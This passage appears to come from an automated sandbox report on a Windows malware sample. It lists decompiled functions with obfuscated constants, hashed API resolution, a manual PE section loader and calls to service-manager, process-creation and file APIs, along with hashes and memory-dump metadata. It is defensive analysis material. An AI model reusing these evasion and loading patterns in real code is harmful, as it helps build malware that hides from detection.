				_v12 = _v12 / _t42;
				_v12 = _v12 ^ 0x000064be;
				_v8 = 0x74da;
				_v8 = _v8 | 0xfefeeaea;
				_v8 = _v8 >> 0xc;
				_v8 = _v8 ^ 0x000fb531;
				E002507A9(0x44082a3f, 0x2c3ac9a2, _t42, _t42, 0x18a);
				_t39 = OpenSCManagerW(0, 0, _a16); // executed
				return _t39;
			}

0x0024295f
0x00242964
0x00242967
0x0024296a
0x0024296d
0x0024296e
0x0024296f
0x00242977
0x00242985
0x0024298a
0x00242992
0x0024299a
0x002429a2
0x002429a9
0x002429b0
0x002429b7
0x002429bb
0x002429cf
0x002429dc
0x002429e2

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,?), ref: 002429DC

Strings

<^, xrefs: 00242977

Memory Dump Source

Source File: 00000007.00000002.2104303323.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2104292967.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2104345430.000000000025C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_240000_rundll32.jbxd

Yara matches

Similarity

API ID: ManagerOpen
String ID: <^
API String ID: 1889721586-3203995635
Opcode ID: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
Instruction ID: 3e6d1b5a01cd0fdcda24aea55cf6fa34e580be4e139d8afb2a8803ff8af63732
Opcode Fuzzy Hash: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
Instruction Fuzzy Hash: 8A016D72A00108BFEB18DF95DC4A8DFBFB6EF49310F108088F508A6250D7B65F619B91

Uniqueness

Uniqueness Score: -1.00%

Function 0024C6C7, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 48
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 58%

			E0024C6C7(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				unsigned int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t29;
				intOrPtr* _t33;
				void* _t34;

				E0024602B(_t29);
				_v28 = 0x4fe02f;
				_v24 = 0x232390;
				_v20 = 0xf8460;
				_v16 = 0;
				_v12 = 0xf625;
				_v12 = _v12 >> 6;
				_v12 = _v12 >> 0xa;
				_v12 = _v12 + 0xffffcc6f;
				_v12 = _v12 ^ 0xffffa5b6;
				_v8 = 0xe5cd;
				_v8 = _v8 + 0xffffae4d;
				_v8 = _v8 | 0xf8bbefe7;
				_v8 = _v8 ^ 0xf8bbcc9a;
				_t33 = E002507A9(0x59a47438, 0xd39e34db, __ecx, __ecx, 0x1e9);
				_t34 =  *_t33(0, _a16, 0, 0, _a4, __ecx, __edx, _a4, 0, _a12, _a16, _a20, 0, 0); // executed
				return _t34;
			}

0x0024c6e1
0x0024c6e6
0x0024c6f0
0x0024c6fc
0x0024c703
0x0024c706
0x0024c70d
0x0024c711
0x0024c715
0x0024c71c
0x0024c723
0x0024c72a
0x0024c731
0x0024c738
0x0024c751
0x0024c762
0x0024c768

APIs

SHGetFolderPathW.SHELL32(00000000,00232390,00000000,00000000,FFFFA5B6), ref: 0024C762

Strings

/O, xrefs: 0024C6E6

Memory Dump Source

Source File: 00000007.00000002.2104303323.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2104292967.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2104345430.000000000025C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_240000_rundll32.jbxd

Yara matches

Similarity

API ID: FolderPath
String ID: /O
API String ID: 1514166925-1923427199
Opcode ID: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
Instruction ID: 3c7cf0de1f5ed7469e7890f97129af1cec401de26ed1d109ba8ab5eb06557b8d
Opcode Fuzzy Hash: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
Instruction Fuzzy Hash: DD1133B290122DBBCB25DF95DC498EFBFB8EF05714F108188F90966210D3714B659BE0

Uniqueness

Uniqueness Score: -1.00%

Function 00241000, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E00241000(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _t33;
				struct HINSTANCE__* _t40;
				signed int _t42;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				E0024602B(_t33);
				_v16 = _v16 & 0x00000000;
				_v24 = 0x1b2eda;
				_v20 = 0x33a3b7;
				_v12 = 0x98c;
				_v12 = _v12 + 0xb426;
				_v12 = _v12 + 0x5beb;
				_t42 = 0x63;
				_v12 = _v12 / _t42;
				_v12 = _v12 ^ 0x00000fce;
				_v8 = 0x120e;
				_v8 = _v8 + 0xfffffcb8;
				_v8 = _v8 + 0xffffefaa;
				_v8 = _v8 >> 5;
				_v8 = _v8 ^ 0x07ff9a02;
				E002507A9(0xa900db79, 0x9164b7cc, _t42, _t42, 0xdd);
				_t40 = LoadLibraryW(_a12); // executed
				return _t40;
			}

0x00241006
0x00241009
0x0024100c
0x00241011
0x00241016
0x0024101d
0x00241026
0x0024102d
0x00241034
0x0024103b
0x00241047
0x0024104f
0x00241057
0x0024105e
0x00241065
0x0024106c
0x00241073
0x00241077
0x0024108b
0x00241096
0x0024109b

APIs

LoadLibraryW.KERNEL32(0033A3B7), ref: 00241096

Strings

[, xrefs: 0024103B

Memory Dump Source

Source File: 00000007.00000002.2104303323.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2104292967.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2104345430.000000000025C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_240000_rundll32.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: [
API String ID: 1029625771-3431493590
Opcode ID: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
Instruction ID: 7a9518ee9f9445a9ea81d9c3fdb50e1bc1c45783eafac264d9cd089ecdcddc20
Opcode Fuzzy Hash: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
Instruction Fuzzy Hash: 27015BB6D01308BBDF04DF94C94A5DEBBB1AB54318F108188E41466291D3B19B689B91

Uniqueness

Uniqueness Score: -1.00%

Function 00244859, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 28
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00244859() {
				signed int _v8;
				signed int _v12;
				void* _t22;

				_v12 = 0xafe2;
				_v12 = _v12 * 0x42;
				_v12 = _v12 + 0xffffdd89;
				_v12 = _v12 ^ 0x002d198d;
				_v8 = 0x5b09;
				_v8 = _v8 | 0xa1ea9544;
				_v8 = _v8 * 0x12;
				_v8 = _v8 ^ 0x6283d9c1;
				E002507A9(0xc44181ea, 0x9164b7cc, _t22, _t22, 0x1a5);
				ExitProcess(0);
			}

0x0024485e
0x0024487a
0x0024487d
0x00244884
0x0024488b
0x00244892
0x0024489d
0x002448a0
0x002448ad
0x002448b7

APIs

ExitProcess.KERNELBASE(00000000), ref: 002448B7

Strings

[, xrefs: 0024488B

Memory Dump Source

Source File: 00000007.00000002.2104303323.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2104292967.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2104345430.000000000025C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_240000_rundll32.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID: [
API String ID: 621844428-1822564810
Opcode ID: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
Instruction ID: eea1a5535cbed8a1fb8469f8cc00cf66a99779d49ea18802af489eead00461e1
Opcode Fuzzy Hash: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
Instruction Fuzzy Hash: 9CF017B0A15209FBDB04CFE8CA9699EBFB9EB40301F20818CE444B7290E3B15F549B54

Uniqueness

Uniqueness Score: -1.00%

Function 10001780, Relevance: 3.1, APIs: 2, Instructions: 66
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 94%

			E10001780(intOrPtr* _a4, long _a8) {
				long _t31;
				signed int _t32;
				intOrPtr* _t37;
				void* _t47;
				void** _t48;
				signed int _t52;
				signed int _t55;
				long _t56;

				_t48 = _a8;
				_t56 = _t48[2];
				if(_t56 != 0) {
					_t52 = _t48[3];
					if((_t52 & 0x02000000) == 0) {
						_t31 =  *(0x10012080 + ((_t52 >> 0x1f) + ((_t52 >> 0x0000001e & 0x00000001) + (_t52 >> 0x0000001d & 0x00000001) * 2) * 2) * 4);
						if((_t52 & 0x04000000) != 0) {
							_t31 = _t31 | 0x00000200;
						}
						_t32 = VirtualProtect( *_t48, _t56, _t31,  &_a8); // executed
						asm("sbb eax, eax");
						return  ~( ~_t32);
					} else {
						_t47 =  *_t48;
						if(_t47 == _t48[1]) {
							if(_t48[4] != 0) {
								L7:
								VirtualFree(_t47, _t56, 0x4000); // executed
							} else {
								_t37 = _a4;
								_t55 =  *(_t37 + 0x30);
								if( *((intOrPtr*)( *_t37 + 0x38)) == _t55 || _t56 % _t55 == 0) {
									goto L7;
								}
							}
						}
						return 1;
					}
				} else {
					return _t56 + 1;
				}
			}

0x10001783
0x10001787
0x1000178c
0x10001797
0x100017a0
0x100017f9
0x10001806
0x10001808
0x10001808
0x10001815
0x1000181d
0x10001824
0x100017a2
0x100017a2
0x100017a7
0x100017ad
0x100017c6
0x100017cd
0x100017af
0x100017af
0x100017b2
0x100017ba
0x00000000
0x00000000
0x100017ba
0x100017ad
0x100017db
0x100017db
0x1000178e
0x10001793
0x10001793

APIs

VirtualFree.KERNELBASE(?,?,00004000,00000000,100013CB,?,1000195F,100013CB,?,00000000,00000000,00000000), ref: 100017CD

Memory Dump Source

Source File: 00000007.00000002.2109745259.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2109727549.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2109828341.000000001000D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2109839027.0000000010012000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2109852772.0000000010015000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 0a855d0dde1407c1c92472205702e4fda3e9c4e53b097d130a35f6ebea364484
Instruction ID: f401046966946d9f8f8c45c464924eb5d72016bba8cd02ac906e1c8dccc1d15e
Opcode Fuzzy Hash: 0a855d0dde1407c1c92472205702e4fda3e9c4e53b097d130a35f6ebea364484
Instruction Fuzzy Hash: EB11BF327101198BE304DE09E880F9AB3BAFF947A0F46825AF509CB295DB30E951C790

Uniqueness

Uniqueness Score: -1.00%

Function 00254F7D, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 32
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 66%

			E00254F7D(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _t17;
				int _t24;

				_push(__ecx);
				_push(__ecx);
				_push(_a4);
				_push(__ecx);
				E0024602B(_t17);
				_v12 = 0xddd8;
				_v12 = _v12 * 0x48;
				_v12 = _v12 ^ 0x003e66d8;
				_v8 = 0xcb35;
				_v8 = _v8 ^ 0x7b88573c;
				_v8 = _v8 * 0x59;
				_v8 = _v8 ^ 0xf27e4a21;
				E002507A9(0x6d6c237b, 0x9164b7cc, __ecx, __ecx, 0xce);
				_t24 = CloseHandle(_a4); // executed
				return _t24;
			}

0x00254f80
0x00254f81
0x00254f82
0x00254f86
0x00254f87
0x00254f8c
0x00254fa5
0x00254fa8
0x00254faf
0x00254fb6
0x00254fc7
0x00254fca
0x00254fd7
0x00254fe2
0x00254fe7

APIs

CloseHandle.KERNELBASE(003E66D8), ref: 00254FE2

Strings

{#lm, xrefs: 00254FC2

Memory Dump Source

Source File: 00000007.00000002.2104303323.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2104292967.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2104345430.000000000025C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_240000_rundll32.jbxd

Yara matches

Similarity

API ID: CloseHandle
String ID: {#lm
API String ID: 2962429428-1564096886
Opcode ID: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
Instruction ID: 06239dc362f97eaa70eb23fd74c1e17bb42c55f8652e937dc061d02bd2fd5417
Opcode Fuzzy Hash: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
Instruction Fuzzy Hash: 03F037B081120CFFDB08DFA4D98689EBFBAEB44300F208199E804AB250D3715B549B55

Uniqueness

Uniqueness Score: -1.00%

Function 10001620, Relevance: 2.6, APIs: 2, Instructions: 103
memoryCOMMON

Download Yara Rule

C-Code - Quality: 66%

			E10001620(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr* _t30;
				signed int _t31;
				void* _t38;
				void* _t49;
				void* _t51;
				intOrPtr _t53;
				signed int _t54;
				intOrPtr _t55;
				long _t56;
				signed int _t58;
				signed int _t59;
				intOrPtr* _t65;
				long _t66;
				intOrPtr _t68;
				void* _t70;
				void* _t72;
				void* _t75;
				long* _t77;
				void* _t78;

				_t30 = _a16;
				_t55 =  *_t30;
				_t68 =  *((intOrPtr*)(_t30 + 4));
				_t31 =  *(_t55 + 0x14) & 0x0000ffff;
				_v8 = _t68;
				_v12 = 0;
				if(0 >=  *((intOrPtr*)(_t55 + 6))) {
					L15:
					return 1;
				} else {
					_t65 = VirtualAlloc;
					_t7 = _t55 + 0x28; // 0x28
					_t77 = _t7 + _t31;
					do {
						_t56 =  *_t77;
						if(_t56 != 0) {
							if(_a8 < _t77[1] + _t56) {
								SetLastError(0xd);
								goto L17;
							} else {
								_t38 = VirtualAlloc( *((intOrPtr*)(_t77 - 4)) + _t68, _t56, 0x1000, 4); // executed
								if(_t38 == 0) {
									goto L17;
								} else {
									_t66 =  *_t77;
									_t51 =  *((intOrPtr*)(_t77 - 4)) + _t68;
									_t70 = _t77[1] + _a4;
									if(_t66 != 0) {
										_t49 = _t51;
										_t75 = _t70 - _t51;
										do {
											 *_t49 =  *((intOrPtr*)(_t75 + _t49));
											_t49 = _t49 + 1;
											_t66 = _t66 - 1;
										} while (_t66 != 0);
									}
									 *(_t77 - 8) = _t51;
									goto L13;
								}
							}
						} else {
							_t54 =  *(_a12 + 0x38);
							if(_t54 <= 0) {
								goto L14;
							} else {
								_push(4);
								_push(0x1000);
								_push(_t54);
								_push( *((intOrPtr*)(_t77 - 4)) + _t68);
								if( *_t65() == 0) {
									L17:
									return 0;
								} else {
									_t72 =  *((intOrPtr*)(_t77 - 4)) + _v8;
									 *(_t77 - 8) = _t72;
									if(_t54 != 0) {
										_t58 = _t54;
										_t59 = _t58 >> 2;
										memset(_t72 + _t59, memset(_t72, 0, _t59 << 2), (_t58 & 0x00000003) << 0);
										_t78 = _t78 + 0x18;
									}
									L13:
									_t68 = _v8;
									_t65 = VirtualAlloc;
									goto L14;
								}
							}
						}
						goto L18;
						L14:
						_t53 = _v12 + 1;
						_t77 =  &(_t77[0xa]);
						_v12 = _t53;
					} while (_t53 < ( *( *_a16 + 6) & 0x0000ffff));
					goto L15;
				}
				L18:
			}

0x10001626
0x1000162a
0x1000162e
0x10001631
0x10001637
0x1000163a
0x10001645
0x1000170a
0x10001713
0x1000164b
0x1000164b
0x10001651
0x10001654
0x10001656
0x10001656
0x1000165a
0x100016ab
0x10001718
0x00000000
0x100016ad
0x100016bb
0x100016bf
0x00000000
0x100016c1
0x100016c4
0x100016c6
0x100016cb
0x100016d0
0x100016d2
0x100016d4
0x100016d6
0x100016d9
0x100016db
0x100016de
0x100016de
0x100016d6
0x100016e1
0x00000000
0x100016e1
0x100016bf
0x1000165c
0x1000165f
0x10001664
0x00000000
0x1000166a
0x1000166d
0x1000166f
0x10001674
0x10001677
0x1000167c
0x10001720
0x10001726
0x10001682
0x10001685
0x10001688
0x1000168d
0x1000168f
0x10001693
0x1000169f
0x1000169f
0x1000169f
0x100016e4
0x100016e4
0x100016e7
0x00000000
0x100016e7
0x1000167c
0x10001664
0x00000000
0x100016ed
0x100016f5
0x100016fa
0x100016fd
0x10001700
0x00000000
0x10001656
0x00000000

APIs

VirtualAlloc.KERNELBASE(?,00000000,00001000,00000004,00000000,00000000,100013CB), ref: 100016BB
SetLastError.KERNEL32(0000000D,00000000,00000000,100013CB), ref: 10001718

Memory Dump Source

Source File: 00000007.00000002.2109745259.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2109727549.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2109828341.000000001000D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2109839027.0000000010012000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2109852772.0000000010015000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: AllocErrorLastVirtual
String ID:
API String ID: 497505419-0
Opcode ID: 499873566bbd645cff9e59e7a492908ec14657ec9cd407e7c376ee034dda42c6
Instruction ID: fad9ae3e34d1be210c33c3a39cf181ee10ee9e26815f97c4518dfa0af5a2346d
Opcode Fuzzy Hash: 499873566bbd645cff9e59e7a492908ec14657ec9cd407e7c376ee034dda42c6
Instruction Fuzzy Hash: C3318F757002459BEB10CF59DC80B9AF7E5EF88380F298569E948DB349D672EC51CB60

Uniqueness

Uniqueness Score: -1.00%

Function 0025976F, Relevance: 1.6, APIs: 1, Instructions: 63
processCOMMON

Download Yara Rule

C-Code - Quality: 21%

			E0025976F(void* __ecx, struct _PROCESS_INFORMATION* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, struct _STARTUPINFOW* _a20, int _a24, intOrPtr _a28, intOrPtr _a40, intOrPtr _a44, intOrPtr _a52, intOrPtr _a56, WCHAR* _a60, WCHAR* _a68) {
				unsigned int _v8;
				signed int _v12;
				void* _t34;
				int _t39;
				struct _PROCESS_INFORMATION* _t48;

				_push(__ecx);
				_push(__ecx);
				_t48 = __edx;
				_push(0);
				_push(_a68);
				_push(0);
				_push(_a60);
				_push(_a56);
				_push(_a52);
				_push(0);
				_push(_a44);
				_push(_a40);
				_push(0);
				_push(0);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0024602B(_t34);
				_v12 = 0xaff9;
				_v12 = _v12 | 0xcee54bd1;
				_v12 = _v12 + 0x6ed6;
				_v12 = _v12 ^ 0xcee61221;
				_v8 = 0x6229;
				_v8 = _v8 ^ 0x42aa9f31;
				_v8 = _v8 >> 2;
				_v8 = _v8 ^ 0x10aad83f;
				E002507A9(0xf0de9e9f, 0x9164b7cc, __ecx, __ecx, 0x155);
				_t39 = CreateProcessW(_a68, _a60, 0, 0, _a24, 0, 0, 0, _a20, _t48); // executed
				return _t39;
			}

0x00259772
0x00259773
0x00259778
0x0025977a
0x0025977b
0x0025977e
0x0025977f
0x00259782
0x00259785
0x00259788
0x00259789
0x0025978c
0x0025978f
0x00259790
0x00259791
0x00259794
0x00259797
0x0025979a
0x0025979d
0x002597a0
0x002597a3
0x002597a6
0x002597a7
0x002597a8
0x002597ad
0x002597b7
0x002597c3
0x002597ca
0x002597d1
0x002597d8
0x002597df
0x002597e3
0x002597fc
0x00259816
0x0025981d

APIs

CreateProcessW.KERNEL32(0024591A,?,00000000,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,0024591A), ref: 00259816

Memory Dump Source

Source File: 00000007.00000002.2104303323.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2104292967.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2104345430.000000000025C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_240000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
Instruction ID: 1e14ee12d85c589b7e607ebae06fa3d48f7016d811bdd3277a2a5c3a4f5dd12d
Opcode Fuzzy Hash: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
Instruction Fuzzy Hash: 2311B072911188BBDF1A9F96DC0ACDF7F7AEF89750F108148FA1556120D2728A60EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0024B566, Relevance: 1.6, APIs: 1, Instructions: 55
fileCOMMON

Download Yara Rule

C-Code - Quality: 31%

			E0024B566(void* __ecx, long __edx, intOrPtr _a4, intOrPtr _a8, long _a12, intOrPtr _a16, intOrPtr _a24, intOrPtr _a28, long _a32, intOrPtr _a36, intOrPtr _a40, long _a44, WCHAR* _a48) {
				unsigned int _v8;
				signed int _v12;
				void* _t32;
				void* _t38;
				long _t47;

				_push(__ecx);
				_push(__ecx);
				_push(_a48);
				_t47 = __edx;
				_push(_a44);
				_push(_a40);
				_push(_a36);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(0);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(0);
				E0024602B(_t32);
				_v8 = 0xfd14;
				_v8 = _v8 >> 4;
				_v8 = _v8 * 0x7a;
				_v8 = _v8 >> 9;
				_v8 = _v8 ^ 0x00002bef;
				_v12 = 0x4f26;
				_v12 = _v12 | 0xe7e97f76;
				_v12 = _v12 ^ 0xe7e94dbb;
				E002507A9(0xfbdf2264, 0x9164b7cc, __ecx, __ecx, 0x1bd);
				_t38 = CreateFileW(_a48, _a12, _t47, 0, _a44, _a32, 0); // executed
				return _t38;
			}

0x0024b569
0x0024b56a
0x0024b56d
0x0024b572
0x0024b574
0x0024b577
0x0024b57a
0x0024b57d
0x0024b580
0x0024b583
0x0024b586
0x0024b587
0x0024b58a
0x0024b58d
0x0024b590
0x0024b593
0x0024b594
0x0024b595
0x0024b59a
0x0024b5a4
0x0024b5b8
0x0024b5c0
0x0024b5c4
0x0024b5cb
0x0024b5d2
0x0024b5d9
0x0024b5e6
0x0024b5fd
0x0024b604

APIs

CreateFileW.KERNELBASE(00250668,?,?,00000000,?,?,00000000,?,?,?,047BBE06,00250668,?,?,?,?), ref: 0024B5FD

Memory Dump Source

Source File: 00000007.00000002.2104303323.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2104292967.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2104345430.000000000025C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_240000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
Instruction ID: da88616ffe8399f7017eec6f07960afbc01f85520a9177dc866ba64319bbb634
Opcode Fuzzy Hash: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
Instruction Fuzzy Hash: 3111C372801248BBDF16DF95DD06CEE7F7AFF89314F148198FA1862120D3729A20EB51

Uniqueness

Uniqueness Score: -1.00%

Function 0025981E, Relevance: 1.5, APIs: 1, Instructions: 43
memoryCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E0025981E(long __ecx, void* __edx, long _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				void* _t22;
				void* _t28;
				void* _t34;
				long _t37;

				_push(__ecx);
				_push(__ecx);
				_push(_a16);
				_t34 = __edx;
				_t37 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0024602B(_t22);
				_v12 = 0xe68;
				_v12 = _v12 * 0x39;
				_v12 = _v12 ^ 0xd1b1d871;
				_v12 = _v12 ^ 0xd1b2fb7e;
				_v8 = 0x629e;
				_v8 = _v8 + 0xfffff5da;
				_v8 = _v8 | 0xbef7b77b;
				_v8 = _v8 ^ 0xbef79fc3;
				E002507A9(0xd2423672, 0x9164b7cc, __ecx, __ecx, 0x1ff);
				_t28 = RtlAllocateHeap(_t34, _a4, _t37); // executed
				return _t28;
			}

0x00259821
0x00259822
0x00259825
0x00259828
0x0025982a
0x0025982c
0x0025982f
0x00259832
0x00259835
0x00259836
0x00259837
0x0025983c
0x00259855
0x00259858
0x0025985f
0x00259866
0x0025986d
0x00259874
0x0025987b
0x0025988e
0x0025989b
0x002598a2

APIs

RtlAllocateHeap.NTDLL(00000000,D1B2FB7E,00000001,?,?,?,002487F2,0000CAAE,0000510C,AD82F196), ref: 0025989B

Memory Dump Source

Source File: 00000007.00000002.2104303323.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2104292967.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2104345430.000000000025C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_240000_rundll32.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
Instruction ID: dfd0e70f4a19a4487747f8be9ec32f2a0c8de25ba219de84762fb4ff62ba155e
Opcode Fuzzy Hash: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
Instruction Fuzzy Hash: 17015A76801208FBDB08EFD5DC46CDFBF79EF85750F108199F918A6220E6715B619BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00257BF4, Relevance: 1.5, APIs: 1, Instructions: 41
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E00257BF4(struct _SHFILEOPSTRUCTW* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				void* _t24;
				int _t31;
				signed int _t33;
				struct _SHFILEOPSTRUCTW* _t40;

				_push(__ecx);
				_push(__ecx);
				_push(_a12);
				_t40 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0024602B(_t24);
				_v8 = 0xa117;
				_t33 = 0x76;
				_v8 = _v8 / _t33;
				_v8 = _v8 >> 4;
				_v8 = _v8 ^ 0x210fe703;
				_v8 = _v8 ^ 0x210fdcea;
				_v12 = 0xf1e9;
				_v12 = _v12 << 9;
				_v12 = _v12 ^ 0x01e3a445;
				E002507A9(0x6b98377a, 0xd39e34db, _t33, _t33, 0x219);
				_t31 = SHFileOperationW(_t40); // executed
				return _t31;
			}

0x00257bf7
0x00257bf8
0x00257bfa
0x00257bfd
0x00257bff
0x00257c02
0x00257c06
0x00257c07
0x00257c0f
0x00257c1d
0x00257c25
0x00257c2d
0x00257c31
0x00257c38
0x00257c3f
0x00257c46
0x00257c4a
0x00257c5e
0x00257c67
0x00257c6d

APIs

SHFileOperationW.SHELL32(68CF93E9,?,?,?,?,?,?), ref: 00257C67

Memory Dump Source

Source File: 00000007.00000002.2104303323.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2104292967.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2104345430.000000000025C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_240000_rundll32.jbxd

Yara matches

Similarity

API ID: FileOperation
String ID:
API String ID: 3080627654-0
Opcode ID: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
Instruction ID: f6689cddd0042f70b7a9cdd3172e5f8eaee73f7251d997c54e2e26b7b788de0d
Opcode Fuzzy Hash: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
Instruction Fuzzy Hash: EB014FB190120CFFEB09DF94CC4A8DEBBB5EF45314F108198F40567240E6B15F609B91

Uniqueness

Uniqueness Score: -1.00%

Function 0024F65F, Relevance: 1.5, APIs: 1, Instructions: 40
serviceCOMMON

Download Yara Rule

C-Code - Quality: 52%

			E0024F65F(int __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, short* _a12, void* _a16, intOrPtr _a20) {
				unsigned int _v8;
				signed int _v12;
				void* _t24;
				void* _t29;
				int _t35;

				_push(__ecx);
				_push(__ecx);
				_push(_a20);
				_t35 = __ecx;
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0024602B(_t24);
				_v12 = 0xd5a7;
				_v12 = _v12 ^ 0x994cba9d;
